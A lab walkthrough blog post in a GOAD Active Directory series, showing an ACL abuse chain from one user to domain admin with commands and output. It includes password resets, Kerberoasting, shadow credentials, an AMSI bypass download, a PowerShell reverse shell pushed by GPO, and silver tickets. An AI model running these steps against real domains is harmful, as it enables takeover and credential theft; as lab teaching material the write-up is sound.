GOAD – part 11 – ACL
On the previous post (Goad pwning part10) we did some exploitation by abusing delegation. On this blog post, we will have fun with ACL in the lab.
In active directory, objects right are called Access Control Entries (ACE), a list of ACE is called Access Control List (ACL).
- The new ACL overview in the lab is this one :
MATCH p=(u)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' and u.admincount=false and not tolower(u.name) contains 'key' RETURN p |

.
sevenkingdoms.local ACL
To start we will focus on the sevenkingdoms killchain of ACL by starting with tywin.lannister (password: powerkingftw135)
- The path here is :
- Tywin -> Jaime : Change password user
- Jaime -> Joffrey : Generic Write user
- Joffrey -> Tyron : WriteDacl on user
- Tyron -> small council : add member on group
- Small council -> dragon stone : write owner group to group
- dragonstone -> kingsguard : write owner to group
- kingsguard -> stannis : Generic all on User
- stannis -> kingslanding : Generic all on Computer

- Let’s try to do all the path from tywin to kingslanding domain controler 🙂
Reminder : Abusing ACL make change on the targets. Be sure to you know what you are doing if you try to exploit it during an audit.
ForceChangePassword on User (Tywin -> Jaime)
- This one should never be done in a pentest (unless the customer is ok with that). You don’t want to block a user during your audit.
- As tywin.lannister we will change jaime.lannister password

net rpc password jaime.lannister -U sevenkingdoms.local/tywin.lannister%powerkingftw135 -S kingslanding.sevenkingdoms.local |
- We set the new jaime password.
- And verify the password is ok.
runas /user:tywin.lannister@sevenkingdoms.local cmd. .\PowerView.ps1$UserPassword = ConvertTo-SecureString 'pasdebraspasdechocolat' -AsPlainText -ForceSet-DomainUserPassword -Identity jaime.lannister -AccountPassword $UserPassword -Credential $Cred -Verbose
nxc smb 192.168.56.10 -u jaime.lannister -d sevenkingdoms.local -p pasdebraspasdechocolat |

GenericWrite on User (Jaime -> Joffrey)
- As we just set up jaime password we will now exploit the GenericWrite from Jaime to Joffrey

- This could be abuse with 3 different technics :
- shadowCredentials (windows server 2016 or +)
- targetKerberoasting (password should be weak enough to be cracked)
- logonScript (this need a user connection and to be honest it never worked or unless with a script already inside sysvol)
Target Kerberoasting
This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target.
- First let’s do a target Kerberoasting, the principe is simple. Add an SPN to the user, ask for a tgs, remove the SPN on the user.
- And now we can crack the TGS just like a classic kerberoasting.
- Shutdown have done a tool which do all the work for you : https://github.com/ShutdownRepo/targetedKerberoast
targetedKerberoast.py -v -d sevenkingdoms.local -u jaime.lannister -p pasdebraspasdechocolat --request-user joffrey.baratheon |

- And now just crack the hash
hashcat -m 13100 -a 0 joffrey.hash rockyou.txt --force |

.
or use nxc ldap "192.168.56.10" -d "sevenkingdoms.local" -u "jaime.lannister" -p "cersei" --kerberoasting kerberoastables.txt
┌──(bolke㉿kali)-[~/htb] └─$ nxc ldap "192.168.56.10" -d "sevenkingdoms.local" -u "jaime.lannister" -p "cersei" --kerberoasting kerberoastables.txt LDAP 192.168.56.10 389 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:None) (channel binding:Never) LDAP 192.168.56.10 389 KINGSLANDING [+] sevenkingdoms.local\jaime.lannister:cersei LDAP 192.168.56.10 389 KINGSLANDING [*] Skipping disabled account: krbtgt LDAP 192.168.56.10 389 KINGSLANDING [*] Total of records returned 1 LDAP 192.168.56.10 389 KINGSLANDING [*] sAMAccountName: joffrey.baratheon, memberOf: ['CN=Baratheon,OU=Stormlands,DC=sevenkingdoms,DC=local', 'CN=Lannister,OU=Westerlands,DC=sevenkingdoms,DC=local'], pwdLastSet: 2026-04-08 11:27:56.158969, lastLogon: <never> LDAP 192.168.56.10 389 KINGSLANDING $krb5tgs$23$*joffrey.baratheon$SEVENKINGDOMS.LOCAL$sevenkingdoms.local\joffrey.baratheon*$ffb9c801e3<snip>080650d1
.
hashcat -m 13100 -a 0 kerberoastables.txt /usr/share/wordlists/rockyou.txt.gz --force
from windows
Enter-PSSession -ComputerName studvm -Credential sevenkingdoms\jaime.lannister
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))
# Make sur that the target account has no SPN
Get-DomainUser 'joffrey.baratheon' | Select serviceprincipalname
# Set the SPN
Set-DomainObject -Identity 'joffrey.baratheon' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
# Obtain a kerberoast hash
$User = Get-DomainUser 'joffrey.baratheon'
$User | Get-DomainSPNTicket | fl
or .\Loader.exe -path C:\ad\TOOLS\Rubeus.exe -args kerberoast /user:joffrey.baratheon /simple /rc4opsec
# Clear the SPNs of the target account
$User | Select serviceprincipalname
Set-DomainObject -Identity victimuser -Clear serviceprincipalname
.
reference : https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
I used a win2022 studvm$ joined to north.sevenkingdoms.local , and logged on as \sevenkingdoms\joffrey.baratheon , and there from rdp session
#load PowerView.ps1
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))
# Make sure that the target account has no SPN
Get-DomainUser 'joffrey.baratheon' | Select serviceprincipalname
# Set the SPN
Set-DomainObject -Identity 'joffrey.baratheon' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}
# Rubeus.exe kerberoast
use PS C:\AD\TOOLS> .\Loader.exe -path C:\ad\TOOLS\Rubeus.exe -args kerberoast /user:joffrey.baratheon /simple /rc4opsec /outfile C:\AD\TOOLS\joffreyhash.txt
# Clear the SPNs of the target account
Set-DomainObject -Identity joffrey.baratheon -Clear serviceprincipalname
an then crack the hash with John
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\rockyou.txt C:\AD\Tools\joffreyhash2.txt
.
PS C:\AD\TOOLS> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\rockyou.txt C:\AD\Tools\joffreyhash2.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 1killerlion (?) 1g 0:00:00:42 DONE (2026-05-22 04:30) 0.02378g/s 309335p/s 309335c/s 309335C/s 1kingjames..1kek9 Use the "--show" option to display all of the cracked passwords reliably Session completed
.
Shadow Credentials
This was already done previously in this blog, one of the fastest exploitation is with certipy:
certipy shadow auto -u jaime.lannister@sevenkingdoms.local -p 'pasdebraspasdechocolat' -account 'joffrey.baratheon' |

from windows
PS C:\AD\TOOLS> ./certipy.exe shadow auto -u jaime.lannister@sevenkingdoms.local -p 'cersei' -account 'joffrey.baratheon' Certipy v5.0.4 - by Oliver Lyak (ly4k) [!] DNS resolution failed: The DNS query name does not exist: SEVENKINGDOMS.LOCAL. [!] Use -debug to print a stacktrace [*] Targeting user 'joffrey.baratheon' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '4f74115ab2074440853e84ca7f6cec02' [*] Adding Key Credential with device ID '4f74115ab2074440853e84ca7f6cec02' to the Key Credentials for 'joffrey.baratheon' [*] Successfully added Key Credential with device ID '4f74115ab2074440853e84ca7f6cec02' to the Key Credentials for 'joffrey.baratheon' [*] Authenticating as 'joffrey.baratheon' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'joffrey.baratheon@sevenkingdoms.local' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'joffrey.baratheon.ccache' [*] Wrote credential cache to 'joffrey.baratheon.ccache' [*] Trying to retrieve NT hash for 'joffrey.baratheon' [*] Restoring the old Key Credentials for 'joffrey.baratheon' [*] Successfully restored the old Key Credentials for 'joffrey.baratheon' [*] NT hash for 'joffrey.baratheon': 3b60abbc25770511334b3829866b08f1 PS C:\AD\TOOLS>
or ShadowCredentials with Whisker+Rubeus : https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
runas /user:jaime.lannister@sevenkingdoms.local cmd
Whisker.exe list /target:joffrey.baratheon
Whisker.exe add /target:joffrey.baratheon
Rubeus.exe asktgt /user:joffrey.baratheon /certificate:MII<snip>RrQ/password:"2AAYSlj7qEV2vZBP" /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /getcredentials /show
.
C:\Windows\system32>runas /user:jaime.lannister@sevenkingdoms.local cmd
Enter the password for jaime.lannister@sevenkingdoms.local:
Attempting to start cmd as user jaime.lannister@sevenkingdoms.local ...
C:\Windows\system32>hostname
STUDVM
--and then --
c:\AD\TOOLS>Whisker.exe list /target:joffrey.baratheon
[*] Searching for the target account
[*] Target user found: CN=joffrey.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
[*] Listing deviced for joffrey.baratheon:
DeviceID: 30a31245-7634-a642-97d6-517d1e032cc2 | Creation Time: 6/10/2026 5:36:03 AM
c:\AD\TOOLS>whoami
sevenkingdoms\jaime.lannister
c:\AD\TOOLS>Whisker.exe add /target:joffrey.baratheon
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password 2AAYSlj7qEV2vZBP
[*] Searching for the target account
[*] Target user found: CN=joffrey.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID c5aa0ab2-a68c-4cbc-af53-b5fb6427eac7
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:joffrey.baratheon /certificate:MIIJyAIB<snip>D5wP1ECAgfQ /password:"2AAYSlj7qEV2vZBP" /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /getcredentials /show
c:\AD\TOOLS>
c:\AD\TOOLS>Rubeus.exe asktgt /user:joffrey.baratheon /certificate:MIIJyAIBAzCCCYQGCSqGSIb3DQEHAaCCCXUEgglxMIIJbTCCB<snip>5wP1ECAgfQ /password:"2AAYSlj7qEV2vZBP" /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /getcredentials /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=joffrey.baratheon
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sevenkingdoms.local\joffrey.baratheon'
[*] Using domain controller: 192.168.56.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIG3jC<snip>5sb2NhbA==
ServiceName : krbtgt/sevenkingdoms.local
ServiceRealm : SEVENKINGDOMS.LOCAL
UserName : joffrey.baratheon (NT_PRINCIPAL)
UserRealm : SEVENKINGDOMS.LOCAL
StartTime : 6/10/2026 6:02:02 AM
EndTime : 6/10/2026 4:02:02 PM
RenewTill : 6/17/2026 6:02:02 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 9yXTG8pcdREUeoxoJ2GvHA==
ASREP (key) : CDA85F24C1EBC65C53F72C368DF0508B
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3B60ABBC25770511334B3829866B08F1
c:\AD\TOOLS>
.
Logon script
- To show the scriptpath ldap value instead of ldapsearch we can use the tool ldeep
ldeep ldap -u jaime.lannister -p 'pasdebraspasdechocolat' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=joffrey.baratheon)' scriptpath
.
<snip>
- Start responder and simulate joffrey connection by starting an RDP connection
responder -I vboxnet0 xfreerdp /d:sevenkingdoms.local /u:joffrey.baratheon /p:'1killerlion' /v:192.168.56.10 /size:80% /cert-ignore |
- And we get the NetNLMV2 hash of joffrey.baratheon and… kingslanding$ !

WriteDacl on User (Joffrey -> Tyron)

- To exploit writeDacl from Joffrey to Tyron we can use dacledit.py
- First let’s look at joffrey’s right on tyron :
dacledit.py -action 'read' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon
- Ok now change the permission to “FullControl” and see the modification
dacledit.py -action 'write' -rights 'FullControl' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'
or from Windows use PowerView.ps1
runas /user:jaime.lannister@sevenkingdoms.local powershell
Import-Module . .\PowerView.ps1
# Add ACLs for a specific user
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "tyron.lannister" -PrincipalIdentity "joffrey.baratheon"
# Retrieve ACLs for a specific user and resolve GUIDs to display names
Get-DomainObjectAcl -Identity "tyron.lannister" -Domain "sevenkingdoms.local" -ResolveGUIDs
- Ok now we can :
- change tyron password
- do a target kerberoasting
- do a shadow credentials
- Let’s just use shadowcredentials :
certipy shadow auto -u joffrey.baratheon@sevenkingdoms.local -p '1killerlion' -account 'tyron.lannister' |
.

.
Add self on Group (Tyron -> Small Council)
- We now got tyron so we can add us into the small council group

- First find the distinguished name
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=tyron.lannister)' distinguishedName ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=Small Council)' distinguishedName
- Add tyron to Small Council
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
- See the result
-
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 membersof 'Small Council'
.

.all in 1 row from linux
┌──(bolke㉿kali)-[~/htb]
└─$ impacket-dacledit -action 'read' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-3008081783-3975149589-1763115855-1118)
[*] ACE[19] info
[*] ACE Type : ACCESS_ALLOWED_ACE
[*] ACE flags : None
[*] Access mask : WriteDACL (0x40000)
[*] Trustee (SID) : joffrey.baratheon (S-1-5-21-3008081783-3975149589-1763115855-1118)
┌──(bolke㉿kali)-[~/htb]
└─$ impacket-dacledit -action 'write' -rights 'FullControl' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260522-144220.bak
[*] DACL modified successfully!
┌──(bolke㉿kali)-[~/htb]
└─$ certipy shadow auto -u joffrey.baratheon@sevenkingdoms.local -p '1killerlion' -account 'tyron.lannister'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: All nameservers failed to answer the query SEVENKINGDOMS.LOCAL. IN A: Server Do53:1.1.1.2@53 answered [Errno 101] Network is unreachable
[!] Use -debug to print a stacktrace
[*] Targeting user 'tyron.lannister'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '58356f0ca2c44b46bb582b770ade37b5'
[*] Adding Key Credential with device ID '58356f0ca2c44b46bb582b770ade37b5' to the Key Credentials for 'tyron.lannister'
[*] Successfully added Key Credential with device ID '58356f0ca2c44b46bb582b770ade37b5' to the Key Credentials for 'tyron.lannister'
[*] Authenticating as 'tyron.lannister' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'tyron.lannister@sevenkingdoms.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'tyron.lannister.ccache'
[*] Wrote credential cache to 'tyron.lannister.ccache'
[*] Trying to retrieve NT hash for 'tyron.lannister'
[*] Restoring the old Key Credentials for 'tyron.lannister'
[*] Successfully restored the old Key Credentials for 'tyron.lannister'
[*] NT hash for 'tyron.lannister': b3b3717f7d51b37fb325f7e7d048e998
┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=tyron.lannister)' distinguishedName
[{
"distinguishedName": "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local",
"dn": "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local"
}]
┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=Small Council)' distinguishedName
[{
"distinguishedName": "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local",
"dn": "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
}]
┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
[+] User CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local successfully added to CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local
┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 membersof 'Small Council'
maester.pycelle (user)
lord.varys (user)
petyer.baelish (user)
stannis.baratheon (user)
renly.baratheon (user)
robert.baratheon (user)
tyron.lannister (user)
cersei.lannister (user)
.
from windows
Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister
iex (iwr http://192.168.56.1/amsibypass2026.txt -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))
Add-DomainGroupMember -Identity 'Small Council' -Members tyron.lannister
Get-DomainGroupMember -Identity 'Small Council' | Select MemberDistinguishedName
net group 'small council'
.
rubeus.exe asktgt /user:sevenkingdoms\tyron.lannister /rc4:b3b3717f7d51b37fb325f7e7d048e998 C:\windows\system32\cmd.exe /show /ptt
.
AddMember on Group (Small Council -> dragonstone)
- Now as tyron we are in the small council, so we can add a member to dragonstone’s group.
- So we just add tyron just like we did before

ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=DragonStone,OU=Crownlands,DC=sevenkingdoms,DC=local"
.
Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1')))
Add-DomainGroupMember -Identity 'Dragonstone' -Members 'tyron.lannister')
net group 'dragonstone'
WriteOwner on Group (dragonstone -> kingsguard)
- Now with the writeOwner privilege we can change the owner of kingsguard to own the group

- Just like before we will use the impacket fork
owneredit.py -action read -target 'kingsguard' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' sevenkingdoms.local/tyron.lannister owneredit.py -action write new-owner 'tyron.lannister' -target 'kingsguard' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' sevenkingdoms.local/tyron.lannister
.
- And the owner of kingsguard group is now tyron.lannister
- As owner of the group we can now change the acl and give us GenericAll on the group
dacledit.py -action 'write' -rights 'FullControl' -principal tyron.lannister -target 'kingsguard' 'sevenkingdoms.local'/'tyron.lannister' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'
- With GenericAll now we can add tyron to the kingsguard group
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=kingsguard,OU=Crownlands,DC=sevenkingdoms,DC=local"
.

from windows
Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister
iex (iwr http://192.168.56.1/amsibypass2026.txt -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "kingsguard" -PrincipalIdentity "tyron.lannister"
Set-DomainObjectOwner -Identity 'KingsGuard' -OwnerIdentity tyron.lannister
Add-DomainGroupMember -Identity 'KingsGuard' -Members 'tyron.lannister'
net group 'KingsGuard'
Generic all on user (kingsguard -> stannis)
- Now tyron is in kingsguard so we can take the control of stannis with the genericAll on stannis

- let’s change stannis password with ldeep
net rpc password stannis.baratheon --pw-nt-hash -U sevenkingdoms.local/tyron.lannister%b3b3717f7d51b37fb325f7e7d048e998 -S kingslanding.sevenkingdoms.local
- We will set the password
Drag0nst0ne(i know it is the same as before but i didn’t want to change screenshots in the next part )
verify : nxc smb sevenkingdoms.local -u stannis.baratheon -p Drag0nst0ne2
from windows
simply with: net user /domain stannis.baratheon Drag0nst0ne3 or
Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister
iex (iwr http://192.168.56.1/amsibypass2026.txt -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))
$userpassword = ConvertTo-SecureString 'Drag0nst0ne2' -AsPlainText -Force
Add-DomainGroupMember -Identity 'KingsGuard' -Members 'tyron.lannister'
Set-DomainUserPassword -Identity stannis.baratheon -AccountPassword $userpassword
how2use Set-DomainUserPassword
$SecPassword = ConvertTo-SecureString 'Needle' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('NORTH\arya.stark', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password@7' -AsPlainText -Force
Set-DomainUserPassword -Identity puretech -AccountPassword $UserPassword -Credential $Cred -Verbose
.
GenericAll on Computer (Stannis -> kingslanding)
- Now we own stannis, let’s finish the domain with the generic Write on the DC

- We already done that on the previous chapter. One way to abuse of this permission is by using Resource Based Constrained Delegation (Goad pwning part10)
- But what if you can’t add a computer in the domain (more and more customers disable the ability for a simple user to add computer to the domains and this is a good practice from a security point of view), you can do a shadow credentials attack on the computer.
- So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the target account. (just like what we did in Goad pwning part5)
- Shadow credentials is now include with certipy (this attack can also be done with pywisker )
certipy shadow auto -u stannis.baratheon@sevenkingdoms.local -p 'Drag0nst0ne' -account 'kingslanding$' |

- Now we got the tgt and the NT hash of kingslanding$
- Obviously we can do a dcsync because kingslanding is a DC, but instead let’s try to directly get a shell
- To do that the easiest way is using s4u2self abuse or create a silver ticket
machine account to administrator shell
s4u2self abuse
- s4u2self abuse : we ask for a TGS as the Administrator domain user
.
impacket-getTGT -hashes ':4fe6145b606158428563e7ae5db9f891' sevenkingdoms.local/kingslanding$
export KRB5CCNAME=kingslanding.ccache
impacket-getST -self -impersonate "Administrator" -altservice "cifs/kingslanding.sevenkingdoms.local" -k -no-pass -dc-ip 192.168.56.10 "sevenkingdoms.local"/'kingslanding$'
.
impacket-getTGT -hashes ':4fe6145b606158428563e7ae5db9f891' sevenkingdoms.local/kingslanding$
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in kingslanding$.ccache
export KRB5CCNAME=kingslanding.ccache
klist
Ticket cache: FILE:kingslanding.ccache
Default principal: kingslanding$@SEVENKINGDOMS.LOCAL
Valid starting Expires Service principal
06/25/2026 10:41:41 06/25/2026 20:41:41 krbtgt/SEVENKINGDOMS.LOCAL@SEVENKINGDOMS.LOCAL
renew until 06/26/2026 10:41:40
impacket-getST -self -impersonate "Administrator" -altservice "cifs/kingslanding.sevenkingdoms.local" -k -no-pass -dc-ip 192.168.56.10 "sevenkingdoms.local"/'kingslanding$'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Changing service from kingslanding$@SEVENKINGDOMS.LOCAL to cifs/kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL
[*] Saving ticket in Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
.
- And than we use that ticket to connect as administrator
export KRB5CCNAME=Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
klist
Ticket cache: FILE:Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
Default principal: Administrator@sevenkingdoms.local
Valid starting Expires Service principal
06/25/2026 10:59:25 06/25/2026 20:41:41 cifs/kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL
renew until 06/26/2026 10:41:40
impacket-wmiexec -k -no-pass sevenkingdoms.local/administrator@kingslanding.sevenkingdoms.local
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
kingslanding
.
or use also working : impacket-psexec -k -no-pass sevenkingdoms.local/administrator@kingslanding.sevenkingdoms.local
.
Silver ticket
- Another way to get a shell is by creating a silver ticket :
- Find the domain SID:
lookupsid.py -hashes ':33a43e326dad53a516dc06393281d2cc' 'sevenkingdoms.local'/'kingslanding$'@kingslanding.sevenkingdoms.local 0 |

- Create the silver ticket:
ticketer.py -nthash '33a43e326dad53a516dc06393281d2cc' -domain-sid 'S-1-5-21-1409754491-4246775990-3914137275' -domain sevenkingdoms.local -spn cifs/kingslanding.sevenkingdoms.local Administrator |
- And use it :
export KRB5CCNAME=/workspace/acl/Administrator.ccache wmiexec.py -k -no-pass sevenkingdoms.local/administrator@kingslanding.sevenkingdoms.local |

Ok the fun with sevenkingdoms.local domain is over, now let’s try some acl in the other domains.
GPO abuse
- There is a GPO abuse on the north domain

- To abuse GPO we will use the project created by Hackndo : pyGPOAbuse
- The github readme file say : “It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.”
git clone https://github.com/Hackndo/pyGPOAbuse.git python3 -m virtualenv .venv source .venv/bin/activate python3 -m pip install -r requirements.txt |
- We get the id from bloodhound and launch the exploit with :
python3 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "6F8BD644-2C29-418C-93F1-FE926F91F6B4" |

- If we take a look in the windows GUI we will see the schedule task created :

- If we wait few minutes or if we run a
gpudate /forcewe will see the new local admin user

- Now let’s try to get a powershell reverseshell
python3 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "6F8BD644-2C29-418C-93F1-FE926F91F6B4" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.56.1',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "don't worry"
.
- And a few moments later we get the powershell reverseshell
pyGPOAbuse is changing the GPO without going back ! Do not use in production or at your own risk and do not forget to cleanup after
- Cleanup
Read Laps password

- To read LAPS password, the easy way is with the cme module
cme ldap 192.168.56.12 -d essos.local -u jorah.mormont -p 'H0nnor!' --module laps |

- Works like a charm 🙂
Resources:
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
- https://www.thehacker.recipes/ad/movement/dacl
- https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
- https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
Next time, this will be the last blog post of the GOAD writeup series. And it will be on Trusts exploitation (Goad pwning part12)